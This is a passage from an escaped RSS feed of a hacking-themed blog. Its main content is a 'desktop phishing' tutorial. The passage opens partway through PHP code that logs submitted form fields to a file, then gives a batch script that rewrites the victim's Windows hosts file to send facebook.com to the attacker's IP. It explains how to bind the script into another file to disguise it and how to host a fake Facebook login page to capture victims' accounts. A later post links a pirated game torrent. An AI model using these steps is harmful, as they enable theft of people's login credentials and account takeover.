variable"&gt;$variable&lt;/code&gt; &lt;code class="php plain"&gt;=&amp;gt; &lt;/code&gt;&lt;code class="php variable"&gt;$value&lt;/code&gt;&lt;code class="php plain"&gt;) { &lt;/code&gt;&lt;/div&gt;&lt;div class="line number5 index4 alt2"&gt;&lt;code class="php plain"&gt;fwrite(&lt;/code&gt;&lt;code class="php variable"&gt;$handler&lt;/code&gt;&lt;code class="php plain"&gt;, &lt;/code&gt;&lt;code class="php variable"&gt;$variable&lt;/code&gt;&lt;code class="php plain"&gt;); &lt;/code&gt;&lt;/div&gt;&lt;div class="line number6 index5 alt1"&gt;&lt;code class="php plain"&gt;fwrite(&lt;/code&gt;&lt;code class="php variable"&gt;$handler&lt;/code&gt;&lt;code class="php plain"&gt;, &lt;/code&gt;&lt;code class="php string"&gt;"="&lt;/code&gt;&lt;code class="php plain"&gt;); &lt;/code&gt;&lt;/div&gt;&lt;div class="line number7 index6 alt2"&gt;&lt;code class="php plain"&gt;fwrite(&lt;/code&gt;&lt;code class="php variable"&gt;$handler&lt;/code&gt;&lt;code class="php plain"&gt;, &lt;/code&gt;&lt;code class="php variable"&gt;$value&lt;/code&gt;&lt;code class="php plain"&gt;); &lt;/code&gt;&lt;/div&gt;&lt;div class="line number8 index7 alt1"&gt;&lt;code class="php plain"&gt;fwrite(&lt;/code&gt;&lt;code class="php variable"&gt;$handler&lt;/code&gt;&lt;code class="php plain"&gt;, &lt;/code&gt;&lt;code class="php string"&gt;"\r\n"&lt;/code&gt;&lt;code class="php plain"&gt;); &lt;/code&gt;&lt;/div&gt;&lt;div class="line number9 index8 alt2"&gt;&lt;code class="php plain"&gt;} &lt;/code&gt;&lt;/div&gt;&lt;div class="line number10 index9 alt1"&gt;&lt;code class="php plain"&gt;fwrite(&lt;/code&gt;&lt;code class="php variable"&gt;$handler&lt;/code&gt;&lt;code class="php plain"&gt;, &lt;/code&gt;&lt;code class="php string"&gt;"\r\n"&lt;/code&gt;&lt;code class="php plain"&gt;); &lt;/code&gt;&lt;/div&gt;&lt;div class="line number11 index10 alt2"&gt;&lt;code class="php plain"&gt;fclose(&lt;/code&gt;&lt;code class="php variable"&gt;$handler&lt;/code&gt;&lt;code class="php plain"&gt;); &lt;/code&gt;&lt;/div&gt;&lt;div class="line number12 index11 alt1"&gt;&lt;code class="php spaces"&gt;&amp;nbsp;&lt;/code&gt;&amp;nbsp;&lt;/div&gt;&lt;div class="line number13 index12 alt2"&gt;&lt;code class="php functions"&gt;exit&lt;/code&gt;&lt;code class="php plain"&gt;; &lt;/code&gt;&lt;/div&gt;&lt;div class="line number14 index13 alt1"&gt;&lt;code class="php plain"&gt;?&amp;gt; &lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;ol&gt;&lt;/ol&gt;&lt;h4&gt;&lt;span style="font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: x-small; line-height: 22px;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;span style="font-size: small;"&gt;3. Phish Facebook Login page&lt;/span&gt;&amp;nbsp; &lt;a href="https://www.dropbox.com/s/sd7rmxyajj5zdtc/index.html" target="_blank"&gt;Download&lt;/a&gt;&lt;/span&gt;&lt;/h4&gt;&lt;/div&gt;&lt;div&gt;&lt;h4&gt;&lt;span style="font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: small; line-height: 22px;"&gt;&lt;span lang="EN-IN" style="color: windowtext;"&gt;&amp;nbsp;&amp;nbsp; 4.Strong Open VPN Download It &lt;a href="http://strongvpn.com/"&gt;Here&lt;/a&gt;&lt;/span&gt;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;/h4&gt;&lt;h4&gt;&lt;span style="font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: small; line-height: 22px;"&gt;5.&lt;/span&gt;&lt;span style="font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: small; line-height: 22px;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;span lang="EN-IN" style="color: windowtext; font-size: 13.5pt;"&gt;&lt;span style="font-size: small;"&gt;Desktop Phishing Script&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/h4&gt;&lt;br /&gt;&lt;span style="font-size: small;"&gt;&lt;span lang="EN-IN" style="line-height: 115%;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;div class="MsoNormal"&gt;&lt;span style="font-size: small;"&gt;&lt;span lang="EN-IN" style="line-height: 115%;"&gt;@echo off&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style="font-size: small;"&gt;&lt;/span&gt;&lt;div class="MsoNormal"&gt;&lt;span style="font-size: small;"&gt;&lt;span lang="EN-IN" style="line-height: 115%;"&gt;echo 0.1.2.3&amp;nbsp;&amp;nbsp; www.facebook.com &amp;gt;&amp;gt; C:\windows\system32\drivers\etc\hosts&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style="font-size: small;"&gt;&lt;/span&gt;&lt;div class="MsoNormal"&gt;&lt;span style="font-size: small;"&gt;&lt;span lang="EN-IN" style="line-height: 115%;"&gt;exit&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;span style="font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; line-height: 22px;"&gt;&lt;span lang="EN-IN" style="color: windowtext;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span style="color: windowtext; text-indent: -0.25in;"&gt;Replace 0.1.2.3 in Desktop phishing script with the ip address you got&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;div class="MsoNormal" style="text-align: left;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;span style="color: windowtext; text-indent: -0.25in;"&gt;from the vpn, to check ip address goto &lt;/span&gt;&lt;a href="http://cmyip.com/" style="text-indent: -0.25in;"&gt;http://cmyip.com&lt;/a&gt;&lt;span style="color: windowtext; text-indent: -0.25in;"&gt; &amp;amp; save file as anything.bat&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="Default" style="margin-left: 0.5in; text-align: left;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;span lang="EN-IN" style="color: windowtext;"&gt;This file could look like suspicious to the person you are sending through&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="text-align: left;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;span lang="EN-IN" style="color: windowtext;"&gt;email or by data transfer medium. So we will bind it with another file&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;span lang="EN-IN" style="color: windowtext;"&gt;using binder’s Google them you will find lots of binders out there.&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;span lang="EN-IN" style="color: windowtext;"&gt;After the victim executes your .bat file his host file adds some thing like&lt;/span&gt; &lt;span lang="EN-IN" style="color: windowtext;"&gt;this&lt;/span&gt;&lt;span style="color: windowtext; text-indent: -0.25in;"&gt; &lt;/span&gt;&lt;br /&gt;&lt;span lang="EN-IN" style="color: windowtext;"&gt;&amp;amp; whenever he enter www.facebook .com he will be redirected to you ip address hosting phisher&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;&lt;ol&gt;&lt;/ol&gt;&lt;span style="font-family: Lucida Grande, Arial, Helvetica, sans-serif; font-size: x-small;"&gt;&lt;span style="line-height: 22px;"&gt;First we install XAMPP &amp;nbsp;in our system that look like&amp;nbsp; are these picture&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgIF_S4LF0sXdfl_TAvOv9ogeC8OXX_Y34UhJFoNwhXqtNMRc1w85pLf8xqNFqbPQYE0Kw7mtMIpT13ORfFb1oMMf5RgrF9YtN2zebYfXE5MEUWkcl064TjuIUJpmt9Isg4U-PiwmR6KLm/s1600/Xampp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgIF_S4LF0sXdfl_TAvOv9ogeC8OXX_Y34UhJFoNwhXqtNMRc1w85pLf8xqNFqbPQYE0Kw7mtMIpT13ORfFb1oMMf5RgrF9YtN2zebYfXE5MEUWkcl064TjuIUJpmt9Isg4U-PiwmR6KLm/s1600/Xampp.png" height="358" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;span style="font-family: Lucida Grande, Arial, Helvetica, sans-serif; font-size: x-small;"&gt;&lt;span style="line-height: 22px;"&gt;:::then navigate in your computer on these location&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: Lucida Grande, Arial, Helvetica, sans-serif; font-size: x-small;"&gt;&lt;span style="line-height: 22px;"&gt;******C:\xampp\htdocs&amp;nbsp;&amp;nbsp; in these folder delete all files &lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="border: 0px; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"&gt;&amp;nbsp;*****paste facebook login script&amp;nbsp; and phish page files&lt;/div&gt;&lt;div style="border: 0px; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRPUCE_9qp05CgVCFcqMMfV3lSFqdgqsNBCNz2kGOe1H-N6_J2jxWglMDA83dELDlFrhjr0BgHQ7BRjJUQ2B1VZ203sJnbR0POiDrVSIOYXRNS2JsDgYORP8xidWurLKuaCQIklj_3jVBO/s1600/htdocs.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRPUCE_9qp05CgVCFcqMMfV3lSFqdgqsNBCNz2kGOe1H-N6_J2jxWglMDA83dELDlFrhjr0BgHQ7BRjJUQ2B1VZ203sJnbR0POiDrVSIOYXRNS2JsDgYORP8xidWurLKuaCQIklj_3jVBO/s1600/htdocs.png" height="358" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="border: 0px; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"&gt;&amp;nbsp;last at least open your Xampp control panel and start Apache and MySQL ......you done your Desktop Phishing is ready..&lt;br /&gt;now&amp;nbsp; open your browser and type 127.0.0.1 in your address bar...your phishing page is now ready to go ...for hacking fb account you simply give your ip address to your victim.&lt;/div&gt;&lt;div style="border: 0px; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgIF_S4LF0sXdfl_TAvOv9ogeC8OXX_Y34UhJFoNwhXqtNMRc1w85pLf8xqNFqbPQYE0Kw7mtMIpT13ORfFb1oMMf5RgrF9YtN2zebYfXE5MEUWkcl064TjuIUJpmt9Isg4U-PiwmR6KLm/s72-c/Xampp.png" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>GTA San Andreas PC Game </title><link>http://bambahacks.blogspot.com/2013/11/gta-san-andreas-pc-game.html</link><category>PC Game</category><author>noreply@blogger.com (Anonymous)</author><pubDate>Tue, 12 Nov 2013 12:00:00 -0800</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-4670434626441035720.post-4947632763150728200</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;h2 style="text-align: left;"&gt;
&lt;b&gt;&lt;i&gt;&lt;span style="font-family: Arial, Helvetica, sans-serif; font-size: large;"&gt;GTA San Andreas PC Game (Highly Compressed)&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;/h2&gt;
&lt;div&gt;
&lt;b&gt;&lt;i&gt;&lt;span style="font-family: Arial, Helvetica, sans-serif; font-size: large;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
&lt;h2 style="background-color: #141414; border-bottom-color: rgb(0, 0, 0); border-bottom-style: solid; border-bottom-width: 1px; color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; margin: 0px -15px; padding: 0.6em 15px 0.5em; position: relative;"&gt;
&lt;i style="font-size: 14px;"&gt;Friends Here I Giving You&amp;nbsp;&lt;/i&gt;&lt;b style="background-color: transparent;"&gt;&lt;i&gt;&lt;span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;"&gt;GTA San Andreas&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;i style="font-size: 14px;"&gt;&amp;nbsp;&lt;/i&gt;&lt;i style="font-size: 14px;"&gt;For PC This Is Ripped Or Compressed Hope You Like It&amp;nbsp;&lt;/i&gt;&lt;/h2&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;i style="font-size: 14px;"&gt;&lt;br /&gt;&lt;/i&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmPw8j7Tnr10cgsf8vSxYpMZHYy7L6_it85jjqykd2JaGU7nXMr5JvrY9N_BTVGmO0kb5M_k5O8ssS-81R0HawpW4qZ3GPQ1mtHj45-zUX-s3smWcTlVusbrAK_E5ipu8Fr5PO2q6fPnVk/s1600/7120.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmPw8j7Tnr10cgsf8vSxYpMZHYy7L6_it85jjqykd2JaGU7nXMr5JvrY9N_BTVGmO0kb5M_k5O8ssS-81R0HawpW4qZ3GPQ1mtHj45-zUX-s3smWcTlVusbrAK_E5ipu8Fr5PO2q6fPnVk/s1600/7120.png" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;span style="color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px;"&gt;&lt;b&gt;Five years ago Carl Johnson escaped from the Los Santos (state of San Andreas) - City crime, drugs and corruption, where even movie stars and millionaires have any means to protect themselves from extortionists and gangsters.Start the 1990's. Carl returns home. His mother was killed, the family split up, my friends are in trouble, but against him made a false accusation of murder. To return the family and restore the old context, Carl goes on a dangerous trip to San Andreas: it should in no matter what was to win the streets of the state.&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="background-color: #141414; color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;"&gt;
&lt;span style="color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; outline: none; text-decoration: underline;"&gt;&lt;b style="outline: none;"&gt;System Requirements:&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="background-color: #141414; color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;"&gt;
&lt;div class="textcontent" id="desc" style="color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; outline: none; padding-bottom: 20px;"&gt;
&lt;i style="color: #666666; font-family: Georgia, 'Times New Roman', Times, serif; font-size: 17px; outline: none;"&gt;Minimum System Requirements&lt;/i&gt;&lt;br /&gt;
System: Pentium 4 1.5GHz or Athlon XP or equivalent&lt;br /&gt;
RAM: 512 MB&lt;br /&gt;
Hard Drive Space: 5000 MB&lt;br /&gt;
Other: GeForce FX or ATI Radeon 9500 - DVD ROM drive&lt;/div&gt;
&lt;div class="textcontent" id="desc" style="color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; outline: none; padding-bottom: 20px;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;i style="color: #666666; font-family: Georgia, 'Times New Roman', Times, serif; font-size: 17px; line-height: 18px; outline: none;"&gt;Recommended System Requirements&lt;/i&gt;&lt;/div&gt;
&lt;div&gt;
&lt;i style="color: #666666; font-family: Georgia, 'Times New Roman', Times, serif; font-size: 17px; line-height: 18px; outline: none;"&gt;&lt;table class="font12px" style="color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; outline: none;"&gt;&lt;tbody style="outline: none;"&gt;
&lt;tr style="outline: none;"&gt;&lt;td style="outline: none;"&gt;&lt;b style="outline: none;"&gt;CPU&lt;/b&gt;:&lt;/td&gt;&lt;td style="outline: none;"&gt;Intel Pentium 4 or AMD Athlon XP Processor&lt;/td&gt;&lt;/tr&gt;
&lt;tr style="outline: none;"&gt;&lt;td style="outline: none;"&gt;&lt;b style="outline: none;"&gt;RAM&lt;/b&gt;:&lt;/td&gt;&lt;td style="outline: none;"&gt;384MB of RAM (the more the better!)&lt;/td&gt;&lt;/tr&gt;
&lt;tr style="outline: none;"&gt;&lt;td style="outline: none;"&gt;&lt;b style="outline: none;"&gt;VGA&lt;/b&gt;:&lt;/td&gt;&lt;td style="outline: none;"&gt;128MB (or greater) Video Card (Geforce 6 Series Recommended)&lt;/td&gt;&lt;/tr&gt;
&lt;tr style="outline: none;"&gt;&lt;td style="outline: none;"&gt;&lt;b style="outline: none;"&gt;DX&lt;/b&gt;:&lt;/td&gt;&lt;td style="outline: none;"&gt;DirectX 9&lt;/td&gt;&lt;/tr&gt;
&lt;tr style="outline: none;"&gt;&lt;td style="outline: none;"&gt;&lt;b style="outline: none;"&gt;OS&lt;/b&gt;:&lt;/td&gt;&lt;td style="outline: none;"&gt;Windows 2000 or Windows XP&lt;/td&gt;&lt;/tr&gt;
&lt;tr style="outline: none;"&gt;&lt;td style="outline: none;"&gt;&lt;b style="outline: none;"&gt;HDD&lt;/b&gt;:&lt;/td&gt;&lt;td style="outline: none;"&gt;4.7GB of free hard disk space (full install)&lt;/td&gt;&lt;/tr&gt;
&lt;tr style="outline: none;"&gt;&lt;td style="outline: none;"&gt;&lt;b style="outline: none;"&gt;Sound&lt;/b&gt;:&lt;/td&gt;&lt;td style="outline: none;"&gt;DirectX 9 compatible Sound Card (Sound Blaster Auidgy 2 Recommended)&lt;/td&gt;&lt;/tr&gt;
&lt;tr style="outline: none;"&gt;&lt;td style="outline: none;"&gt;&lt;b style="outline: none;"&gt;ODD&lt;/b&gt;:&lt;/td&gt;&lt;td style="outline: none;"&gt;16-Speed DVD-ROM drive&lt;/td&gt;&lt;/tr&gt;
&lt;tr style="outline: none;"&gt;&lt;td style="outline: none;"&gt;&lt;b style="outline: none;"&gt;Recommended peripheral&lt;/b&gt;:&lt;/td&gt;&lt;td style="outline: none;"&gt;Keyboard &amp;amp; Mouse Gamepad with twin axis analog controls&lt;br /&gt;
&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;span style="color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; font-style: normal;"&gt;TO DOWNLOAD THIS GAME YOU HAVE TO INSTALL BIT TORRENT TO YOUR PC&lt;/span&gt;&lt;br style="color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; font-style: normal;" /&gt;&lt;span style="color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; font-style: normal;"&gt;DOWNLOAD LINK IS BELOW&lt;/span&gt;&lt;/i&gt;&lt;/div&gt;
&lt;div&gt;
&lt;i style="color: #666666; font-family: Georgia, 'Times New Roman', Times, serif; font-size: 17px; line-height: 18px; outline: none;"&gt;&lt;span style="color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; font-style: normal;"&gt;&lt;a href="http://torcache.net/torrent/5F45F390CEF0136DBC88B4D7BCABF8DC216CAD48.torrent?title=[kickass.to]gta.san.andreas.pc.game.highly.compressed" target="_blank"&gt;GTA San Andreas PC Game &lt;/a&gt;&lt;/span&gt;&lt;/i&gt;&lt;/div&gt;
&lt;/div&gt;
</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmPw8j7Tnr10cgsf8vSxYpMZHYy7L6_it85jjqykd2JaGU7nXMr5JvrY9N_BTVGmO0kb5M_k5O8ssS-81R0HawpW4qZ3GPQ1mtHj45-zUX-s3smWcTlVusbrAK_E5ipu8Fr5PO2q6fPnVk/s72-c/7120.png" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>Stream Video from Android Mobile</title><link>http://bambahacks.blogspot.com/2013/11/stream-video-from-android-mobile.html</link><category>Android</category><author>noreply@blogger.com (Anonymous)</author><pubDate>Tue, 12 Nov 2013 08:52:00 -0800</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-4670434626441035720.post-7844430306992012997</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;Hey Guyz Today&amp;nbsp; I show you something really cool and interesting thing in your android phone ...&lt;br /&gt;so here we go...&lt;br /&gt;First thing we need is&amp;nbsp; a app called &lt;span style="background-color: black;"&gt;&lt;span style="color: magenta;"&gt;&lt;/span&gt;&lt;/span&gt;IPWEBCAM&lt;br /&gt;&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;&lt;h2 style="text-align: left;"&gt;1.IPWEBCAM&lt;/h2&gt;&lt;div class="heading"&gt;&lt;h3 style="text-align: left;"&gt; Description &lt;/h3&gt;&lt;/div&gt;&lt;div class="app-orig-desc"&gt;Turns  your phone into a network camera with multiple viewing options. View  your camera on any platform with VLC player or web browser. Stream video  inside WiFi network without internet access.Use IP Webcam with  tinyCam Monitor on another android device or with third-party MJPG  software, including video surveillance software, security monitors and  most audio players.&lt;br /&gt;Videochat support (e.g. Skype, Chatroulette, only video stream for Windows only via an universal MJPG video streaming driver)&lt;br /&gt;Email me if you have questions after reading the FAQ.&lt;br /&gt;SEO:  ip webcam, wireless camera, spy cam, video streaming, broadcasting, ip  camera, wifi camera, audio streaming, nanny cam, security camera, ipcam,  pet monitor&lt;br /&gt;&lt;a href="https://db.tt/Xn6qCcqw" target="_blank"&gt;Download&lt;/a&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzox9WDyAp4O-dI71HtGKLWRLpdNNmQDTNrdzYbh722u6FnHho9N6GAptN4cjw71OMAJfDTbYnvWhAFxlCuv-jTCeM5HWYtvCITYtFciUMlrt-gXerts3ZNzJl4dz4nXll11ofa3JZ8kX-/s1600/images.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzox9WDyAp4O-dI71HtGKLWRLpdNNmQDTNrdzYbh722u6FnHho9N6GAptN4cjw71OMAJfDTbYnvWhAFxlCuv-jTCeM5HWYtvCITYtFciUMlrt-gXerts3ZNzJl4dz4nXll11ofa3JZ8kX-/s1600/images.jpg" /&gt;&lt;/a&gt;&lt;/div&gt;&amp;nbsp;start server&amp;gt;&amp;gt;&amp;gt;&amp;gt;then you find your ipaddress&amp;nbsp; &amp;gt;&amp;gt;&amp;gt;&amp;gt;&amp;gt;copy your ip address and note down in Browser&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3Vh5irq_xO8hwfkM0CToVsnd4ig-9nyNYOJj7evCo025hfo00fCehiFRO4Px2rZvTIBQ-Y3KgDQsqMiIwMujjDaaiJQjX9fPcjXjPWNKVos35SjqeCNsoJlMBE4j02Hc_2lFwapvl1dPJ/s1600/webcam.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3Vh5irq_xO8hwfkM0CToVsnd4ig-9nyNYOJj7evCo025hfo00fCehiFRO4Px2rZvTIBQ-Y3KgDQsqMiIwMujjDaaiJQjX9fPcjXjPWNKVos35SjqeCNsoJlMBE4j02Hc_2lFwapvl1dPJ/s1600/webcam.png" height="358" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;br /&gt;&amp;nbsp;Now here you find many type of option like photoshot ,audio streaming and much more..&lt;br /&gt;But your main motive is video streaming so you copy your video streaming links&amp;nbsp; and open your vlc then go to &lt;u&gt;&lt;b&gt;Media &lt;/b&gt;&lt;/u&gt;options and&amp;nbsp; click on&lt;u&gt;&lt;b&gt; Open&amp;nbsp; Networkstream&lt;/b&gt;&lt;/u&gt;&amp;nbsp;&amp;nbsp; and paste your link and click on play&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivqZ9SQg2eVjQBqhXUiMKXsHUlYz4kWLpiqc1vwhVbykDT26OJGTxeB4s9J4Ijs13iM7S2ut88hOqPFhdJtXMc0iD8WSr_8ui5S31Y1l1DVhM5peeQ0lRsvUcPq7yzwGsK4LBxhYanhrMO/s1600/vlc.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivqZ9SQg2eVjQBqhXUiMKXsHUlYz4kWLpiqc1vwhVbykDT26OJGTxeB4s9J4Ijs13iM7S2ut88hOqPFhdJtXMc0iD8WSr_8ui5S31Y1l1DVhM5peeQ0lRsvUcPq7yzwGsK4LBxhYanhrMO/s1600/vlc.png" height="358" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;/div&gt;</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzox9WDyAp4O-dI71HtGKLWRLpdNNmQDTNrdzYbh722u6FnHho9N6GAptN4cjw71OMAJfDTbYnvWhAFxlCuv-jTCeM5HWYtvCITYtFciUMlrt-gXerts3ZNzJl4dz4nXll11ofa3JZ8kX-/s72-c/images.jpg" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><enclosure length="-1" type="application/json" url="https://db.tt/Xn6qCcqw"/><itunes:explicit>no</itunes:explicit><itunes:subtitle>Hey Guyz Today&amp;nbsp; I show you something really cool and interesting thing in your android phone ... so here we go... First thing we need is&amp;nbsp; a app called IPWEBCAM 1.IPWEBCAM Description Turns your phone into a network camera with multiple viewing options. View your camera on any platform with VLC player or web browser. Stream video inside WiFi network without internet access.Use IP Webcam with tinyCam Monitor on another android device or with third-party MJPG software, including video surveillance software, security monitors and most audio players. Videochat support (e.g. Skype, Chatroulette, only video stream for Windows only via an universal MJPG video streaming driver) Email me if you have questions after reading the FAQ. SEO: ip webcam, wireless camera, spy cam, video streaming, broadcasting, ip camera, wifi camera, audio streaming, nanny cam, security camera, ipcam, pet monitor Download &amp;nbsp;start server&amp;gt;&amp;gt;&amp;gt;&amp;gt;then you find your ipaddress&amp;nbsp; &amp;gt;&amp;gt;&amp;gt;&amp;gt;&amp;gt;copy your ip address and note down in Browser &amp;nbsp;Now here you find many type of option like photoshot ,audio streaming and much more.. But your main motive is video streaming so you copy your video streaming links&amp;nbsp; and open your vlc then go to Media options and&amp;nbsp; click on Open&amp;nbsp; Networkstream&amp;nbsp;&amp;nbsp; and paste your link and click on play</itunes:subtitle><itunes:author>noreply@blogger.com (Anonymous)</itunes:author><itunes:summary>Hey Guyz Today&amp;nbsp; I show you something really cool and interesting thing in your android phone ... so here we go... First thing we need is&amp;nbsp; a app called IPWEBCAM 1.IPWEBCAM Description Turns your phone into a network camera with multiple viewing options. View your camera on any platform with VLC player or web browser. Stream video inside WiFi network without internet access.Use IP Webcam with tinyCam Monitor on another android device or with third-party MJPG software, including video surveillance software, security monitors and most audio players. Videochat support (e.g. Skype, Chatroulette, only video stream for Windows only via an universal MJPG video streaming driver) Email me if you have questions after reading the FAQ. SEO: ip webcam, wireless camera, spy cam, video streaming, broadcasting, ip camera, wifi camera, audio streaming, nanny cam, security camera, ipcam, pet monitor Download &amp;nbsp;start server&amp;gt;&amp;gt;&amp;gt;&amp;gt;then you find your ipaddress&amp;nbsp; &amp;gt;&amp;gt;&amp;gt;&amp;gt;&amp;gt;copy your ip address and note down in Browser &amp;nbsp;Now here you find many type of option like photoshot ,audio streaming and much more.. But your main motive is video streaming so you 